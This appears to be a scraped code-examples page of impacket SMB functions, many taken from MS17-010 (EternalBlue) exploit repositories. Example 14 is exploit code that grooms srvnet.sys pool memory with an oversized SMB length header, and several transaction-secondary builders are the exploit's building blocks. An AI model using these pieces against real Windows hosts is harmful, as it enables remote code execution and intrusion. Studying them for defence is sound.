Python impacket.smb.SMB Examples

Example #1
Source File: smbconnection.py    From cracke-dit with MIT License 6 votes vote down vote up
def reconnect(self):
    """
    Re-establish the SMB session with the options and credentials used originally.

    The dialect is renegotiated with ``self._preferredDialect`` and a login is
    then attempted with the stored credentials and the original method
    (Kerberos, PtH, etc). The only exception is that manualNegotiate will not
    be honored.

    Note that this relies on ``getCredentials()`` handing back the password,
    LM/NT hashes, AES key and tickets, i.e. the object keeps that material
    available for as long as it is alive.

    :return: True, raises a SessionError exception if error
    """
    creds = self.getCredentials()
    userName, password, domain, lmhash, nthash, aesKey, TGT, TGS = creds

    self.negotiateSession(self._preferredDialect)

    # Identity test on purpose: only the literal True selects Kerberos.
    if self._doKerberos is not True:
        self.login(userName, password, domain, lmhash, nthash, self._ntlmFallback)
        return True

    self.kerberosLogin(userName, password, domain, lmhash, nthash, aesKey,
                       self._kdcHost, TGT, TGS, self._useCache)
    return True
Example #2
Source File: smbconnection.py    From CVE-2017-7494 with GNU General Public License v3.0 6 votes vote down vote up
def reconnect(self):
    """
    Reconnect the SMB object using the original options and credentials.

    Negotiation is repeated with ``self._preferredDialect`` (manualNegotiate
    will not be honored), followed by a login attempt with the original
    credentials and method (Kerberos, PtH, etc). The credentials are read back
    from ``getCredentials()``, so the object holds on to the password, hashes,
    key and tickets between connections.

    :return: True, raises a SessionError exception if error
    """
    (userName, password, domain, lmhash, nthash,
     aesKey, TGT, TGS) = self.getCredentials()

    self.negotiateSession(self._preferredDialect)

    use_kerberos = self._doKerberos is True  # identity check, not truthiness
    if use_kerberos:
        self.kerberosLogin(userName, password, domain, lmhash, nthash, aesKey,
                           self._kdcHost, TGT, TGS, self._useCache)
    else:
        self.login(userName, password, domain, lmhash, nthash, self._ntlmFallback)

    return True
Example #3
Source File: mysmb.py    From MS17-010-Python with MIT License 6 votes vote down vote up
def create_trans_packet(self, setup, param='', data='', mid=None, maxSetupCount=None, totalParameterCount=None, totalDataCount=None, maxParameterCount=None, maxDataCount=None, pid=None, tid=None, noPad=False):
    """Build an SMB_COM_TRANSACTION request and return it as a framed packet.

    Count arguments left as None are derived from the buffers: the setup and
    total counts default to ``len(setup)``, ``len(param)`` and ``len(data)``,
    and the two "max" counts default to the matching totals. Explicit values
    are written into the header as given; nothing here checks them against
    the actual buffer lengths.

    Returns the result of ``self.create_smb_packet`` for the command.
    """
    maxSetupCount = len(setup) if maxSetupCount is None else maxSetupCount
    totalParameterCount = len(param) if totalParameterCount is None else totalParameterCount
    totalDataCount = len(data) if totalDataCount is None else totalDataCount
    maxParameterCount = totalParameterCount if maxParameterCount is None else maxParameterCount
    maxDataCount = totalDataCount if maxDataCount is None else maxDataCount

    transCmd = smb.SMBCommand(smb.SMB.SMB_COM_TRANSACTION)
    transCmd['Parameters'] = smb.SMBTransaction_Parameters()
    header = transCmd['Parameters']
    for field, value in (
        ('TotalParameterCount', totalParameterCount),
        ('TotalDataCount', totalDataCount),
        ('MaxParameterCount', maxParameterCount),
        ('MaxDataCount', maxDataCount),
        ('MaxSetupCount', maxSetupCount),
        ('Flags', 0),
        ('Timeout', 0xffffffff),
        # Per-message counts always describe the buffers actually attached.
        ('ParameterCount', len(param)),
        ('DataCount', len(data)),
        ('Setup', setup),
    ):
        header[field] = value

    # Fills in the parameter/data offsets and the command's 'Data' field.
    _put_trans_data(transCmd, param, data, noPad)
    return self.create_smb_packet(transCmd, mid, pid, tid)
Example #4
Source File: mysmb.py    From MS17-010-Python with MIT License 6 votes vote down vote up
def create_trans2_packet(self, setup, param='', data='', mid=None, maxSetupCount=None, totalParameterCount=None, totalDataCount=None, maxParameterCount=None, maxDataCount=None, pid=None, tid=None, noPad=False):
    """Build an SMB_COM_TRANSACTION2 request and return it as a framed packet.

    Total counts left as None default to ``len(param)`` / ``len(data)`` and
    the "max" counts default to the matching totals. Explicit values are
    written into the header as given, without being checked against the
    actual buffer lengths.

    NOTE(review): ``maxSetupCount`` is accepted but has no effect here;
    the MaxSetupCount field is always ``len(setup)``. The sibling
    transaction builders honour the argument, so this looks unintentional.

    Returns the result of ``self.create_smb_packet`` for the command.
    """
    totalParameterCount = len(param) if totalParameterCount is None else totalParameterCount
    totalDataCount = len(data) if totalDataCount is None else totalDataCount
    maxParameterCount = totalParameterCount if maxParameterCount is None else maxParameterCount
    maxDataCount = totalDataCount if maxDataCount is None else maxDataCount

    transCmd = smb.SMBCommand(smb.SMB.SMB_COM_TRANSACTION2)
    transCmd['Parameters'] = smb.SMBTransaction2_Parameters()
    header = transCmd['Parameters']
    for field, value in (
        ('TotalParameterCount', totalParameterCount),
        ('TotalDataCount', totalDataCount),
        ('MaxParameterCount', maxParameterCount),
        ('MaxDataCount', maxDataCount),
        ('MaxSetupCount', len(setup)),
        ('Flags', 0),
        ('Timeout', 0xffffffff),
        ('ParameterCount', len(param)),
        ('DataCount', len(data)),
        ('Setup', setup),
    ):
        header[field] = value

    # Fills in the parameter/data offsets and the command's 'Data' field.
    _put_trans_data(transCmd, param, data, noPad)
    return self.create_smb_packet(transCmd, mid, pid, tid)
Example #5
Source File: mysmb.py    From MS17-010-Python with MIT License 6 votes vote down vote up
def create_nt_trans_packet(self, function, setup='', param='', data='', mid=None, maxSetupCount=None, totalParameterCount=None, totalDataCount=None, maxParameterCount=None, maxDataCount=None, pid=None, tid=None, noPad=False):
    """Build an SMB_COM_NT_TRANSACT request for ``function`` as a framed packet.

    Count arguments left as None are derived from the buffers: setup and
    total counts default to the buffer lengths and the "max" counts default
    to the matching totals. Explicit values are written as given; they are
    not checked against the actual buffer lengths.

    Returns the result of ``self.create_smb_packet`` for the command.
    """
    maxSetupCount = len(setup) if maxSetupCount is None else maxSetupCount
    totalParameterCount = len(param) if totalParameterCount is None else totalParameterCount
    totalDataCount = len(data) if totalDataCount is None else totalDataCount
    maxParameterCount = totalParameterCount if maxParameterCount is None else maxParameterCount
    maxDataCount = totalDataCount if maxDataCount is None else maxDataCount

    transCmd = smb.SMBCommand(smb.SMB.SMB_COM_NT_TRANSACT)
    transCmd['Parameters'] = smb.SMBNTTransaction_Parameters()
    header = transCmd['Parameters']
    for field, value in (
        ('MaxSetupCount', maxSetupCount),
        ('TotalParameterCount', totalParameterCount),
        ('TotalDataCount', totalDataCount),
        ('MaxParameterCount', maxParameterCount),
        ('MaxDataCount', maxDataCount),
        ('ParameterCount', len(param)),
        ('DataCount', len(data)),
        ('Function', function),
        ('Setup', setup),
    ):
        header[field] = value

    # Fills in the parameter/data offsets and the command's 'Data' field.
    _put_trans_data(transCmd, param, data, noPad)
    return self.create_smb_packet(transCmd, mid, pid, tid)
Example #6
Source File: 42315.py    From exploitdb-bin-sploits with GNU General Public License v2.0 6 votes vote down vote up
def _put_trans_data(transCmd, parameters, data, noPad=False):
    """Attach the parameter and data buffers to a transaction command.

    Sets ``ParameterOffset`` / ``DataOffset`` inside ``transCmd['Parameters']``
    and stores the concatenated (optionally padded) buffers in
    ``transCmd['Data']``. An empty buffer leaves its offset at 0. Unless
    ``noPad`` is true, each non-empty buffer is preceded by NUL bytes so that
    it starts on a 4-byte boundary.
    """
    header = transCmd['Parameters']
    # Both offsets must exist before len() is taken on the parameter block.
    header['ParameterOffset'] = 0
    header['DataOffset'] = 0

    # SMB header (32) + WordCount (1) + parameter block + ByteCount (2).
    # The setup length is already part of len() of the parameter block.
    cursor = 32 + 1 + len(header) + 2

    body = ''
    if len(parameters) > 0:
        pad = 0 if noPad else -cursor % 4
        header['ParameterOffset'] = cursor + pad
        body = ('\x00' * pad) + parameters
        cursor = cursor + pad + len(parameters)

    if len(data) > 0:
        pad = 0 if noPad else -cursor % 4
        header['DataOffset'] = cursor + pad
        body += ('\x00' * pad) + data

    transCmd['Data'] = body
Example #7
Source File: mysmb.py    From MS17-010-Python with MIT License 6 votes vote down vote up
def _put_trans_data(transCmd, parameters, data, noPad=False):
    """Lay out the parameter and data buffers behind a transaction header.

    Writes ``ParameterOffset`` and ``DataOffset`` into
    ``transCmd['Parameters']`` and the combined buffers into
    ``transCmd['Data']``. Offsets stay 0 for empty buffers. With ``noPad``
    false, NUL padding aligns each non-empty buffer to a multiple of four.
    """
    def _alignment(position):
        # Bytes needed to reach the next 4-byte boundary (0 when noPad is set).
        return 0 if noPad else (4 - position % 4) % 4

    # The offset fields have to be initialised before len() is called.
    transCmd['Parameters']['ParameterOffset'] = 0
    transCmd['Parameters']['DataOffset'] = 0

    # 32-byte SMB header, 1-byte WordCount, parameter block (setup included
    # in its len()), 2-byte ByteCount.
    position = 32 + 1 + len(transCmd['Parameters']) + 2

    combined = ''
    if len(parameters) != 0:
        gap = _alignment(position)
        transCmd['Parameters']['ParameterOffset'] = position + gap
        combined = ('\x00' * gap) + parameters
        position += gap + len(parameters)

    if len(data) != 0:
        gap = _alignment(position)
        transCmd['Parameters']['DataOffset'] = position + gap
        combined += ('\x00' * gap) + data

    transCmd['Data'] = combined
Example #8
Source File: mysmb.py    From AutoBlue-MS17-010 with MIT License 6 votes vote down vote up
def create_nt_trans_packet(self, function, setup='', param='', data='', mid=None, maxSetupCount=None, totalParameterCount=None, totalDataCount=None, maxParameterCount=None, maxDataCount=None, pid=None, tid=None, noPad=False):
    """Return a framed SMB_COM_NT_TRANSACT request for ``function``.

    Any count argument that is None is computed from the buffers (setup and
    total counts from the buffer lengths, "max" counts from the totals).
    Caller-supplied counts are copied into the header unchanged and are not
    validated against the buffers.
    """
    if maxSetupCount is None:
        maxSetupCount = len(setup)
    if totalParameterCount is None:
        totalParameterCount = len(param)
    if totalDataCount is None:
        totalDataCount = len(data)
    if maxParameterCount is None:
        maxParameterCount = totalParameterCount
    if maxDataCount is None:
        maxDataCount = totalDataCount

    transCmd = smb.SMBCommand(smb.SMB.SMB_COM_NT_TRANSACT)
    transCmd['Parameters'] = smb.SMBNTTransaction_Parameters()
    fields = transCmd['Parameters']
    fields['MaxSetupCount'] = maxSetupCount
    fields['TotalParameterCount'] = totalParameterCount
    fields['TotalDataCount'] = totalDataCount
    fields['MaxParameterCount'] = maxParameterCount
    fields['MaxDataCount'] = maxDataCount
    # The per-message counts always reflect the buffers actually attached.
    fields['ParameterCount'] = len(param)
    fields['DataCount'] = len(data)
    fields['Function'] = function
    fields['Setup'] = setup

    _put_trans_data(transCmd, param, data, noPad)
    framed = self.create_smb_packet(transCmd, mid, pid, tid)
    return framed
Example #9
Source File: mysmb.py    From AutoBlue-MS17-010 with MIT License 6 votes vote down vote up
def create_trans2_packet(self, setup, param='', data='', mid=None, maxSetupCount=None, totalParameterCount=None, totalDataCount=None, maxParameterCount=None, maxDataCount=None, pid=None, tid=None, noPad=False):
    """Return a framed SMB_COM_TRANSACTION2 request.

    Total counts that are None are taken from ``len(param)`` / ``len(data)``;
    "max" counts that are None are taken from the totals. Caller-supplied
    counts are copied into the header unchanged and are not validated
    against the buffers.

    NOTE(review): ``maxSetupCount`` is ignored; MaxSetupCount is always
    written as ``len(setup)``. Confirm whether that is intended.
    """
    if totalParameterCount is None:
        totalParameterCount = len(param)
    if totalDataCount is None:
        totalDataCount = len(data)
    if maxParameterCount is None:
        maxParameterCount = totalParameterCount
    if maxDataCount is None:
        maxDataCount = totalDataCount

    transCmd = smb.SMBCommand(smb.SMB.SMB_COM_TRANSACTION2)
    transCmd['Parameters'] = smb.SMBTransaction2_Parameters()
    fields = transCmd['Parameters']
    fields['TotalParameterCount'] = totalParameterCount
    fields['TotalDataCount'] = totalDataCount
    fields['MaxParameterCount'] = maxParameterCount
    fields['MaxDataCount'] = maxDataCount
    fields['MaxSetupCount'] = len(setup)
    fields['Flags'] = 0
    fields['Timeout'] = 0xffffffff
    fields['ParameterCount'] = len(param)
    fields['DataCount'] = len(data)
    fields['Setup'] = setup

    _put_trans_data(transCmd, param, data, noPad)
    framed = self.create_smb_packet(transCmd, mid, pid, tid)
    return framed
Example #10
Source File: mysmb.py    From AutoBlue-MS17-010 with MIT License 6 votes vote down vote up
def create_smb_packet(self, smbReq, mid=None, pid=None, tid=None):
    """Wrap ``smbReq`` in an SMB packet and prefix a 4-byte length header.

    ``mid`` defaults to ``self.next_mid()``; ``tid`` and ``pid`` default to
    ``self._default_tid`` and ``self._pid``. Flags2 comes from
    ``self._pkt_flags2`` when that is non-zero, otherwise from
    ``self.get_flags()``. When ``self._SignatureEnabled`` is set, the
    signature flag is added and the packet is signed before serialising.

    The length is packed as an unsigned 16-bit value, so a serialised packet
    of 65536 bytes or more makes ``pack`` raise. The string handling
    (``str(pkt)`` joined with ``pack`` output) follows Python 2 semantics.
    """
    if mid is None:
        mid = self.next_mid()

    pkt = smb.NewSMBPacket()
    pkt.addCommand(smbReq)
    pkt['Tid'] = tid if tid is not None else self._default_tid
    pkt['Uid'] = self._uid
    pkt['Pid'] = pid if pid is not None else self._pid
    pkt['Mid'] = mid

    flags1, flags2 = self.get_flags()
    pkt['Flags1'] = flags1
    # A non-zero per-object override wins over the negotiated Flags2.
    pkt['Flags2'] = flags2 if self._pkt_flags2 == 0 else self._pkt_flags2

    if self._SignatureEnabled:
        pkt['Flags2'] |= smb.SMB.FLAGS2_SMB_SECURITY_SIGNATURE
        self.signSMB(pkt, self._SigningSessionKey, self._SigningChallengeResponse)

    serialised = str(pkt)
    # assume length is <65536
    length_prefix = '\x00'*2 + pack('>H', len(serialised))
    return length_prefix + serialised
Example #11
Source File: 42315.py    From exploitdb-bin-sploits with GNU General Public License v2.0 6 votes vote down vote up
def create_trans_packet(self, setup, param='', data='', mid=None, maxSetupCount=None, totalParameterCount=None, totalDataCount=None, maxParameterCount=None, maxDataCount=None, pid=None, tid=None, noPad=False):
    """Return a framed SMB_COM_TRANSACTION request.

    Any count argument that is None is computed from the buffers (setup and
    total counts from the buffer lengths, "max" counts from the totals).
    Caller-supplied counts are copied into the header unchanged and are not
    validated against the buffers.
    """
    if maxSetupCount is None:
        maxSetupCount = len(setup)
    if totalParameterCount is None:
        totalParameterCount = len(param)
    if totalDataCount is None:
        totalDataCount = len(data)
    if maxParameterCount is None:
        maxParameterCount = totalParameterCount
    if maxDataCount is None:
        maxDataCount = totalDataCount

    transCmd = smb.SMBCommand(smb.SMB.SMB_COM_TRANSACTION)
    transCmd['Parameters'] = smb.SMBTransaction_Parameters()
    fields = transCmd['Parameters']
    fields['TotalParameterCount'] = totalParameterCount
    fields['TotalDataCount'] = totalDataCount
    fields['MaxParameterCount'] = maxParameterCount
    fields['MaxDataCount'] = maxDataCount
    fields['MaxSetupCount'] = maxSetupCount
    fields['Flags'] = 0
    fields['Timeout'] = 0xffffffff
    # The per-message counts always reflect the buffers actually attached.
    fields['ParameterCount'] = len(param)
    fields['DataCount'] = len(data)
    fields['Setup'] = setup

    _put_trans_data(transCmd, param, data, noPad)
    framed = self.create_smb_packet(transCmd, mid, pid, tid)
    return framed
Example #12
Source File: 42315.py    From exploitdb-bin-sploits with GNU General Public License v2.0 6 votes vote down vote up
def create_trans2_packet(self, setup, param='', data='', mid=None, maxSetupCount=None, totalParameterCount=None, totalDataCount=None, maxParameterCount=None, maxDataCount=None, pid=None, tid=None, noPad=False):
    """Assemble an SMB_COM_TRANSACTION2 request and hand it to create_smb_packet.

    Totals default to the lengths of ``param`` and ``data``; the "max"
    counts default to those totals. Values passed explicitly go into the
    header untouched, with no cross-check against the buffers.

    NOTE(review): the ``maxSetupCount`` argument is never used; the
    MaxSetupCount field is set from ``len(setup)`` unconditionally.
    """
    def _or_default(value, fallback):
        # Keep an explicit value; fall back only for None.
        return fallback if value is None else value

    totalParameterCount = _or_default(totalParameterCount, len(param))
    totalDataCount = _or_default(totalDataCount, len(data))
    maxParameterCount = _or_default(maxParameterCount, totalParameterCount)
    maxDataCount = _or_default(maxDataCount, totalDataCount)

    transCmd = smb.SMBCommand(smb.SMB.SMB_COM_TRANSACTION2)
    transCmd['Parameters'] = smb.SMBTransaction2_Parameters()
    block_ = transCmd['Parameters']
    block_['TotalParameterCount'] = totalParameterCount
    block_['TotalDataCount'] = totalDataCount
    block_['MaxParameterCount'] = maxParameterCount
    block_['MaxDataCount'] = maxDataCount
    block_['MaxSetupCount'] = len(setup)
    block_['Flags'] = 0
    block_['Timeout'] = 0xffffffff
    block_['ParameterCount'] = len(param)
    block_['DataCount'] = len(data)
    block_['Setup'] = setup

    _put_trans_data(transCmd, param, data, noPad)
    return self.create_smb_packet(transCmd, mid, pid, tid)
Example #13
Source File: 42315.py    From exploitdb-bin-sploits with GNU General Public License v2.0 6 votes vote down vote up
def create_nt_trans_packet(self, function, setup='', param='', data='', mid=None, maxSetupCount=None, totalParameterCount=None, totalDataCount=None, maxParameterCount=None, maxDataCount=None, pid=None, tid=None, noPad=False):
    """Assemble an SMB_COM_NT_TRANSACT request and hand it to create_smb_packet.

    The setup count and totals default to the lengths of ``setup``,
    ``param`` and ``data``; the "max" counts default to the totals. Values
    passed explicitly go into the header untouched, with no cross-check
    against the buffers.
    """
    def _or_default(value, fallback):
        # Keep an explicit value; fall back only for None.
        return fallback if value is None else value

    maxSetupCount = _or_default(maxSetupCount, len(setup))
    totalParameterCount = _or_default(totalParameterCount, len(param))
    totalDataCount = _or_default(totalDataCount, len(data))
    maxParameterCount = _or_default(maxParameterCount, totalParameterCount)
    maxDataCount = _or_default(maxDataCount, totalDataCount)

    transCmd = smb.SMBCommand(smb.SMB.SMB_COM_NT_TRANSACT)
    transCmd['Parameters'] = smb.SMBNTTransaction_Parameters()
    block_ = transCmd['Parameters']
    block_['MaxSetupCount'] = maxSetupCount
    block_['TotalParameterCount'] = totalParameterCount
    block_['TotalDataCount'] = totalDataCount
    block_['MaxParameterCount'] = maxParameterCount
    block_['MaxDataCount'] = maxDataCount
    block_['ParameterCount'] = len(param)
    block_['DataCount'] = len(data)
    block_['Function'] = function
    block_['Setup'] = setup

    _put_trans_data(transCmd, param, data, noPad)
    return self.create_smb_packet(transCmd, mid, pid, tid)
Example #14
Source File: eternalblue_exploit7.py    From AutoBlue-MS17-010 with MIT License 6 votes vote down vote up
def createConnectionWithBigSMBFirst80(target):
	"""Open a TCP connection to port 445 and send a 0x80-byte partial message.

	The message is a 4-byte length header followed by the 4 bytes 'BAAD' and
	0x7c NUL bytes. The header announces far more data (0xfff7) than is sent.
	The connected socket is returned and left open.

	For defenders: a length header this large followed by so little data,
	and by bytes that are not an SMB magic, is an anomaly visible on the
	wire. The string concatenation relies on Python 2 str semantics.
	"""
	# https://msdn.microsoft.com/en-us/library/cc246496.aspx
	# The link above describes SMB2, but what matters here is the first 4 bytes.
	# In Wireshark, StreamProtocolLength is shown as the NBSS length.
	# The first 4 bytes are the same for all SMB versions. They determine the SMB message length.
	#
	# After receiving the first 4 bytes, srvnet.sys allocates nonpaged pool for receiving the SMB message.
	# srvnet.sys forwards this buffer to the SMB message handler once the whole SMB message has arrived.
	# Note: on Windows 7 and Windows 2008, srvnet.sys also forwards the SMB message to its handler when the connection is lost.
	sk = socket.create_connection((target, 445))
	# For this exploit, the size used is 0x11000
	# NOTE(review): the length written below is 0xfff7; 0x11000 presumably refers to the resulting allocation size - confirm.
	pkt = '\x00' + '\x00' + pack('>H', 0xfff7)
	# The message does not need to be SMB2, because code execution comes from the corrupted srvnet buffer.
	# This is also an invalid SMB2 message.
	# The original author believes the NSA exploit used SMB2 to avoid IDS alerts.
	#pkt += '\xfeSMB' # smb2
	# The content can be anything, even if it is invalid
	pkt += 'BAAD' # can be any
	pkt += '\x00'*0x7c
	sk.send(pkt)
	return sk
Example #15
Source File: eternalblue_exploit8.py    From AutoBlue-MS17-010 with MIT License 6 votes vote down vote up
def sendEcho(conn, tid, data):
    """Send one SMB_COM_ECHO carrying ``data`` on tree ``tid`` and report the reply.

    Prints a success line when the reply's NT status is 0, otherwise prints
    the status in hex. Nothing is returned.
    """
    echo = smb.SMBCommand(smb.SMB.SMB_COM_ECHO)
    echo['Parameters'] = smb.SMBEcho_Parameters()
    echo['Data'] = smb.SMBEcho_Data()
    echo['Parameters']['EchoCount'] = 1
    echo['Data']['Data'] = data

    pkt = smb.NewSMBPacket()
    pkt['Tid'] = tid
    pkt.addCommand(echo)

    conn.sendSMB(pkt)
    reply = conn.recvSMB()
    if reply.getNTStatus() != 0:
        print('got bad ECHO response: 0x{:x}'.format(reply.getNTStatus()))
        return
    print('got good ECHO response')


# override SMB.neg_session() to allow forcing ntlm authentication 
Example #16
Source File: eternalblue_exploit7.py    From AutoBlue-MS17-010 with MIT License 6 votes vote down vote up
def sendEcho(conn, tid, data):
    """Issue a single SMB echo request with ``data`` and print the outcome.

    An NT status of 0 in the reply is reported as good; any other status is
    printed in hexadecimal. The function returns None.
    """
    request = smb.NewSMBPacket()
    request['Tid'] = tid

    echoCmd = smb.SMBCommand(smb.SMB.SMB_COM_ECHO)
    echoCmd['Parameters'] = smb.SMBEcho_Parameters()
    echoCmd['Data'] = smb.SMBEcho_Data()
    echoCmd['Parameters']['EchoCount'] = 1
    echoCmd['Data']['Data'] = data
    request.addCommand(echoCmd)

    conn.sendSMB(request)
    response = conn.recvSMB()
    succeeded = response.getNTStatus() == 0
    if succeeded:
        message = 'got good ECHO response'
    else:
        message = 'got bad ECHO response: 0x{:x}'.format(response.getNTStatus())
    print(message)
Example #17
Source File: eternalblue_exploit10.py    From AutoBlue-MS17-010 with MIT License 6 votes vote down vote up
def sendEcho(conn, tid, data):
    """Round-trip one SMB_COM_ECHO with payload ``data`` and print the result.

    The reply's NT status decides the message: 0 prints the "good" line,
    anything else prints the "bad" line with the status in hex.
    """
    command = smb.SMBCommand(smb.SMB.SMB_COM_ECHO)
    command['Parameters'] = smb.SMBEcho_Parameters()
    command['Data'] = smb.SMBEcho_Data()
    command['Parameters']['EchoCount'] = 1
    command['Data']['Data'] = data

    outgoing = smb.NewSMBPacket()
    outgoing['Tid'] = tid
    outgoing.addCommand(command)
    conn.sendSMB(outgoing)

    incoming = conn.recvSMB()
    if not incoming.getNTStatus() == 0:
        print('got bad ECHO response: 0x{:x}'.format(incoming.getNTStatus()))
    else:
        print('got good ECHO response')


# override SMB.neg_session() to allow forcing ntlm authentication 
Example #18
Source File: mysmb.py    From MS17-010-Python with MIT License 5 votes vote down vote up
def connect_tree(self, path, password=None, service=smb.SERVICE_ANY, smb_packet=None):
    """Connect to the share at ``path`` and remember the tree id.

    Delegates to ``smb.SMB.tree_connect_andx`` and stores its result in
    ``self._last_tid`` before returning it.
    """
    tree_id = smb.SMB.tree_connect_andx(self, path, password, service, smb_packet)
    self._last_tid = tree_id
    return self._last_tid
Example #19
Source File: mysmb.py    From AutoBlue-MS17-010 with MIT License 5 votes vote down vote up
def login_standard(self, user, password, domain='', lmhash='', nthash='', maxBufferSize=None):
    """Run ``smb.SMB.login_standard`` after installing the login packet hook.

    ``maxBufferSize`` is passed to ``_setup_login_packet_hook``, which is
    defined outside this view. The result of the parent login is not
    returned.

    NOTE(review): if the hook changes module-level state, logins from
    several threads would interfere with each other - confirm.
    """
    _setup_login_packet_hook(maxBufferSize)
    parent_login = smb.SMB.login_standard
    parent_login(self, user, password, domain, lmhash, nthash)
Example #20
Source File: mysmb.py    From AutoBlue-MS17-010 with MIT License 5 votes vote down vote up
def login(self, user, password, domain='', lmhash='', nthash='', ntlm_fallback=True, maxBufferSize=None):
    """Run ``smb.SMB.login`` after installing the login packet hook.

    ``maxBufferSize`` is passed to ``_setup_login_packet_hook``, which is
    defined outside this view. The result of the parent login is not
    returned.

    NOTE(review): ``ntlm_fallback`` is accepted but not forwarded, so the
    parent method always runs with its own default for that argument.
    """
    _setup_login_packet_hook(maxBufferSize)
    parent_login = smb.SMB.login
    parent_login(self, user, password, domain, lmhash, nthash)
Example #21
Source File: mysmb.py    From MS17-010-Python with MIT License 5 votes vote down vote up
def do_write_andx_raw_pipe(self, fid, data, mid=None, pid=None, tid=None):
    """Send ``data`` to ``fid`` with an SMB_COM_WRITE_ANDX in raw named-pipe mode.

    The request is framed by ``self.create_smb_packet``, sent with
    ``self.send_raw`` and the next received SMB packet is returned.
    """
    writeAndX = smb.SMBCommand(smb.SMB.SMB_COM_WRITE_ANDX)
    writeAndX['Parameters'] = smb.SMBWriteAndX_Parameters_Short()

    fields = writeAndX['Parameters']
    fields['Fid'] = fid
    fields['Offset'] = 0
    fields['WriteMode'] = 4  # SMB_WMODE_WRITE_RAW_NAMED_PIPE
    fields['Remaining'] = 12345  # arbitrary: raw named pipe mode does not use it
    fields['DataLength'] = len(data)
    # 32 (presumably the SMB header size) + parameter block
    # + WordCount(1) + ByteCount(2) + Padding(1)
    fields['DataOffset'] = 32 + len(fields) + 1 + 2 + 1
    writeAndX['Data'] = '\x00' + data  # the single padding byte counted above

    request = self.create_smb_packet(writeAndX, mid, pid, tid)
    self.send_raw(request)
    return self.recvSMB()
Example #22
Source File: mysmb.py    From AutoBlue-MS17-010 with MIT License 5 votes vote down vote up
def neg_session(self, extended_security=True, negPacket=None):
    """Negotiate the session with the security mode chosen at construction.

    The ``extended_security`` argument is ignored: the value stored in
    ``self.__use_ntlmv2`` is passed to ``smb.SMB.neg_session`` instead.
    """
    chosen_mode = self.__use_ntlmv2
    smb.SMB.neg_session(self, extended_security=chosen_mode, negPacket=negPacket)

	# to use any login method, SMB must not be used from multiple thread 
Example #23
Source File: mysmb.py    From AutoBlue-MS17-010 with MIT License 5 votes vote down vote up
def get_dce_rpc(self, named_pipe):
    """Return a DCE/RPC object bound to ``named_pipe`` over this SMB connection.

    Builds a ``transport.SMBTransport`` for the remote host that reuses the
    connection from ``self.get_smbconnection()`` and targets the pipe path
    ``'\\' + named_pipe``.
    """
    smbConn = self.get_smbconnection()
    pipe_transport = transport.SMBTransport(
        self.get_remote_host(),
        self.get_remote_host(),
        filename='\\' + named_pipe,
        smb_connection=smbConn,
    )
    return pipe_transport.get_dce_rpc()

	# override SMB.neg_session() to allow forcing ntlm authentication 
Example #24
Source File: mysmb.py    From MS17-010-Python with MIT License 5 votes vote down vote up
def create_trans_secondary_packet(self, mid, param='', paramDisplacement=0, data='', dataDisplacement=0, pid=None, tid=None, noPad=False):
    """Build an SMB_COM_TRANSACTION_SECONDARY request as a framed packet.

    Both the total and the per-message counts are set to the lengths of the
    ``param`` and ``data`` passed to this call. The displacement values are
    written as supplied; nothing here relates them to the sizes announced by
    the primary request.
    """
    param_len = len(param)
    data_len = len(data)

    transCmd = smb.SMBCommand(smb.SMB.SMB_COM_TRANSACTION_SECONDARY)
    transCmd['Parameters'] = SMBTransactionSecondary_Parameters()
    fields = transCmd['Parameters']
    fields['TotalParameterCount'] = param_len
    fields['TotalDataCount'] = data_len
    fields['ParameterCount'] = param_len
    fields['ParameterDisplacement'] = paramDisplacement
    fields['DataCount'] = data_len
    fields['DataDisplacement'] = dataDisplacement

    # Fills in the parameter/data offsets and the command's 'Data' field.
    _put_trans_data(transCmd, param, data, noPad)
    return self.create_smb_packet(transCmd, mid, pid, tid)
Example #25
Source File: mysmb.py    From AutoBlue-MS17-010 with MIT License 5 votes vote down vote up
def __init__(self, remote_host, use_ntlmv2=True, timeout=8):
    """Initialise the bookkeeping fields, then the underlying ``smb.SMB`` object.

    ``remote_host`` is passed to ``smb.SMB.__init__`` as both of its first
    two arguments. The starting message id is random in [1000, 20000]; a
    value inside 0x4000..0x4110 is moved up by 0x120 so that it leaves that
    range (the reason is not stated in this code).
    """
    self.__use_ntlmv2 = use_ntlmv2
    self._default_tid = 0
    # Only the low 16 bits of the process id are kept.
    self._pid = os.getpid() & 0xffff

    first_mid = random.randint(1000, 20000)
    if 0x4000 <= first_mid <= 0x4110:
        first_mid += 0x120
    self._last_mid = first_mid

    self._pkt_flags2 = 0
    self._last_tid = 0  # last tid from connect_tree()
    self._last_fid = 0  # last fid from nt_create_andx()
    self._smbConn = None
    smb.SMB.__init__(self, remote_host, remote_host, timeout=timeout)
Example #26
Source File: mysmb.py    From MS17-010-Python with MIT License 5 votes vote down vote up
def create_trans2_secondary_packet(self, mid, param='', paramDisplacement=0, data='', dataDisplacement=0, pid=None, tid=None, noPad=False):
    """Build an SMB_COM_TRANSACTION2_SECONDARY request as a framed packet.

    Both the total and the per-message counts are set to the lengths of the
    ``param`` and ``data`` passed to this call. The displacement values are
    written as supplied; nothing here relates them to the sizes announced by
    the primary request.
    """
    param_len = len(param)
    data_len = len(data)

    transCmd = smb.SMBCommand(smb.SMB.SMB_COM_TRANSACTION2_SECONDARY)
    transCmd['Parameters'] = SMBTransaction2Secondary_Parameters()
    fields = transCmd['Parameters']
    fields['TotalParameterCount'] = param_len
    fields['TotalDataCount'] = data_len
    fields['ParameterCount'] = param_len
    fields['ParameterDisplacement'] = paramDisplacement
    fields['DataCount'] = data_len
    fields['DataDisplacement'] = dataDisplacement

    # Fills in the parameter/data offsets and the command's 'Data' field.
    _put_trans_data(transCmd, param, data, noPad)
    return self.create_smb_packet(transCmd, mid, pid, tid)
Example #27
Source File: eternalblue_exploit7.py    From AutoBlue-MS17-010 with MIT License 5 votes vote down vote up
def send_trans2_second(conn, tid, data, displacement):
    """Send one SMB_COM_TRANSACTION2_SECONDARY message carrying only data.

    No transaction parameters are sent (all parameter counts and the
    parameter offset are 0). ``displacement`` is written into
    DataDisplacement as given. Non-empty data is preceded by 0xFF padding up
    to a 4-byte boundary. Nothing is received or returned.
    """
    data_len = len(data)
    # Fixed part in front of the data area: 32 + 3 + 18 bytes.
    fixedOffset = 32+3+18
    pad2Len = (4 - fixedOffset % 4) % 4 if data_len > 0 else 0

    transCommand = smb.SMBCommand(smb.SMB.SMB_COM_TRANSACTION2_SECONDARY)
    transCommand['Parameters'] = SMBTransaction2Secondary_Parameters_Fixed()
    transCommand['Data'] = smb.SMBTransaction2Secondary_Data()

    # assume no params
    header = transCommand['Parameters']
    header['TotalParameterCount'] = 0
    header['TotalDataCount'] = data_len
